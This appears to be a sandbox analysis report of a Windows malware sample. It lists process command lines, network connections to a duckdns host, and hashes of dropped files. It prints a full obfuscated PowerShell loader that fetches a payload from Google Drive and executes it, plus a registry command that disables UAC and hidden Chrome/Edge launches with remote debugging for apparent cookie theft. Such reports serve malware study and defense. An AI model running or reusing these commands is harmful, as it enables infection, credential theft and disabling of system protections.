BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files\Google\Chrome\Application\Chrome.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9d9b9cc40,0x7ff9d9b9cc4c,0x7ff9d9b9cc58
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mjefag"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yfpqbrgoycnn"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1924 /prefetch:2
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2128 /prefetch:3
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2308 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4376,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3676 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4692 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9d9a546f8,0x7ff9d9a54708,0x7ff9d9a54718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2980 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 172.217.16.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13hindi4pistatukoy4tra.duckdns.org | udp |
| US | 154.216.18.79:47392 | 13hindi4pistatukoy4tra.duckdns.org | tcp |
| US | 154.216.18.79:47392 | 13hindi4pistatukoy4tra.duckdns.org | tcp |
| US | 154.216.18.79:47392 | 13hindi4pistatukoy4tra.duckdns.org | tcp |
| US | 154.216.18.79:47392 | 13hindi4pistatukoy4tra.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 79.18.216.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.234:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 142.250.187.234:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| N/A | 127.0.0.1:9222 | tcp | |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/4528-4-0x00007FF9D9553000-0x00007FF9D9555000-memory.dmp
memory/4528-5-0x0000026BEA090000-0x0000026BEA0B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cjxnantl.iq5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4528-15-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp
memory/4528-16-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp
memory/4528-19-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp
memory/4528-20-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp
memory/4528-23-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp
memory/1468-24-0x0000000002B50000-0x0000000002B86000-memory.dmp
memory/1468-25-0x0000000005520000-0x0000000005B48000-memory.dmp
memory/1468-26-0x0000000005BB0000-0x0000000005BD2000-memory.dmp
memory/1468-27-0x0000000005C50000-0x0000000005CB6000-memory.dmp
memory/1468-28-0x0000000005CC0000-0x0000000005D26000-memory.dmp
memory/1468-38-0x0000000005DF0000-0x0000000006144000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f58e73a5c43b0713d39bb6cca4251670 |
| SHA1 | ece141754053a0d3855b7270a9569601e99dbbf6 |
| SHA256 | f374315ca436a4f0505cdc56d043e1176df91064603a38001902cf596262d015 |
| SHA512 | 1872b460e63288eabd785e10c76ee0b35bb9c37891193ad4ac0992e37f2fd6d9e692cea26ceec58b219b892910825e80d8e009c161d36735eb1dd839d4622ee8 |
memory/1468-40-0x0000000006440000-0x000000000645E000-memory.dmp
memory/1468-41-0x0000000006460000-0x00000000064AC000-memory.dmp
memory/1468-42-0x0000000007C20000-0x000000000829A000-memory.dmp
memory/1468-43-0x00000000075A0000-0x00000000075BA000-memory.dmp
memory/1468-44-0x0000000007690000-0x0000000007726000-memory.dmp
memory/1468-45-0x0000000007640000-0x0000000007662000-memory.dmp
memory/1468-46-0x0000000008850000-0x0000000008DF4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Overballast.Van
| MD5 | d7b88800546dce0f4e1f1df0c00bbd38 |
| SHA1 | e36f1565ded075365e68dd93ae93b63b24882325 |
| SHA256 | 29bec0378c0caadfb30794b545b50f3498631248f06dbfce7d4ae233737a5535 |
| SHA512 | 173192d430f26a32a4a52d0d9be716cbc75ed6dd5d22b8eb53ba6553d683c700115f48897d330f97f687a35287c9a943bed2299f26357d980568ede8708a3feb |
memory/1468-48-0x0000000008E00000-0x000000000C9DA000-memory.dmp
memory/2400-62-0x0000000000A00000-0x0000000001C54000-memory.dmp
memory/2400-63-0x0000000000A00000-0x0000000001C54000-memory.dmp
memory/2400-69-0x00000000214E0000-0x0000000021514000-memory.dmp
memory/2400-73-0x00000000214E0000-0x0000000021514000-memory.dmp
memory/2400-72-0x00000000214E0000-0x0000000021514000-memory.dmp
memory/2424-79-0x0000000000400000-0x0000000000478000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State
| MD5 | 8d8dcad3d6137a36506f5aaf6e19b4ce |
| SHA1 | dd97f59dc37f5c1f853a0a6d5acde8742f3d63e5 |
| SHA256 | c809f4286da7aedf166b2acc34f6101f3095dbfe2453620592db0948b18110cc |
| SHA512 | d150fa593bf1f8f27cff617251d7a90a91ddb16efdf5c3f1c093e80d5249aa1953b33ef9ced7552fe7ea00437297c02217eaa95990e7bb4a66e9f3d715b4b5b7 |
memory/2424-83-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2424-81-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4448-85-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2424-88-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3764-93-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3764-89-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4448-87-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3764-86-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4448-84-0x0000000000400000-0x0000000000462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences
| MD5 | ebc04efe08c5b479d966dcc4098ad9fd |
| SHA1 | 982c038afc8f5c796145ad9f244dd630ed49ed85 |
| SHA256 | 0cff7fb1fa385668dd0006c0ae569a42ade53e94f948aef3092a176482374144 |
| SHA512 | a8d8f13c25f0c8c3e2576043c84aa4224a188483dcef98d8edb9bc0c83d4232e74e444aba2565a7c76192fc3ad71de2ed4c6b9ec68426f16eee788d065bf143b |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies
| MD5 | 6f27555cbe1a0d786558e04566b4bd53 |
| SHA1 | b3790bb9baebbb92d6bd2bfb02fbc8a6b68af0dc |
| SHA256 | bb549aab3a1d4cce89d5fb044da67fd592a287bc9d7ad47ac37dd79c89a4fb1d |
| SHA512 | 03a620524476d336e391e56bed9cf060588bd7421ccc7fe07dfd328748c8587f04be8f8db56587a237df9f483e9c85f4455f9f1483595b8c8289dcdae1838a2a |
\??\pipe\crashpad_2548_TTDXIHQAUTMNNLZD
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2
